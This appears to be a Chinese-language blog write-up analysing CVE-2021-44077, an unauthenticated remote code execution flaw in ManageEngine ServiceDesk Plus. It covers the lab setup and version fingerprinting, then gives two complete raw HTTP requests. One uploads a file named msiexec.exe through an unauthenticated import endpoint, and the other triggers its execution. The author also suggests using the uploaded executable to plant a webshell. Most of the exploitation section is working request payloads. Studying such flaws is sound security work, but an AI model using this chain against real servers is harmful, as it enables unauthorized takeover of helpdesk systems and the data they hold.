CVE-2021-44077 Zoho ManageEngine ServiceDesk Plus Pre-Auth RCE

注意
本文最后更新于 2021-12-07,文中内容可能已过时。

环境搭建

11303版本的才有ImportTechnicians action,11305版本没有,踩了个大坑。

http://archives.manageengine.com/service-desk/11303/ManageEngine_ServiceDesk_Plus_64bit.exe

调试环境和补丁比对就不写了

另外获取版本可以通过下面的方式

1
http://192.168.137.189:8080/servlets/DCPluginServlet?action=getVersionDetails

其中buildnumber是版本号,自己搭建了N个环境,测出来影响的版本应该为11200 到 11303。因为11200之前web.xml没有restapi的servlet-mapping。

命令执行

根据cisa的披露文章来看,需要运行一个msiexec.exe,用grep找到了com.manageengine.s247.actions.S247Action#s247AgentInstallationProcess

https://y4er.com/img/uploads/CVE-2021-44077-Zoho-ManageEngine-ServiceDesk-Plus-Pre-auth-RCE/1.png

继续调用S247Util.installAgentProgress(apikey)

https://y4er.com/img/uploads/CVE-2021-44077-Zoho-ManageEngine-ServiceDesk-Plus-Pre-auth-RCE/2.png

会执行C:\Program Files\ManageEngine\ServiceDesk\bin\msiexec.exe /i Site24x7WindowsAgent.msi EDITA1=apikey /qn

根据web.xml配置构造出url

http://192.168.137.189:8080/s247action.do?execute=s247AgentInstallationProcess

https://y4er.com/img/uploads/CVE-2021-44077-Zoho-ManageEngine-ServiceDesk-Plus-Pre-auth-RCE/3.png

但是这个url需要授权,接着看

上传文件

根据披露文章可知,上传点位于/RestAPI/ImportTechnicians?step=1

https://y4er.com/img/uploads/CVE-2021-44077-Zoho-ManageEngine-ServiceDesk-Plus-Pre-auth-RCE/4.png

com.adventnet.servicedesk.setup.action.ImportTechniciansAction

https://y4er.com/img/uploads/CVE-2021-44077-Zoho-ManageEngine-ServiceDesk-Plus-Pre-auth-RCE/5.png

直接写入iuf.getTheFile()获取到的文件

构造上传包,这里不需要授权就能调用api就挺离谱

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
POST /RestAPI/ImportTechnicians?step=1 HTTP/1.1
Host: 192.168.137.189:8080
Content-Length: 191
Cache-Control: max-age=0
Origin: null
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRBcwSPhzFlHZQPEo
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryRBcwSPhzFlHZQPEo
Content-Disposition: form-data; name="theFile"; filename="msiexec.exe"
Content-Type: image/jpeg

asd
------WebKitFormBoundaryRBcwSPhzFlHZQPEo--

然后通过上面的命令执行rce就行了

串起来

s247action.do需要授权,我们可以用RestAPI来调用

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
POST /RestAPI/s247action HTTP/1.1
Host: 192.168.137.189:8080
Cache-Control: max-age=0
Origin: null
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

execute=s247AgentInstallationProcess

然后整个流程就是先传msiexec.exe 然后执行命令就行了。msiexec.exe内容可以自写exe,投递webshell。

总结

不需要认证的离谱洞。

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。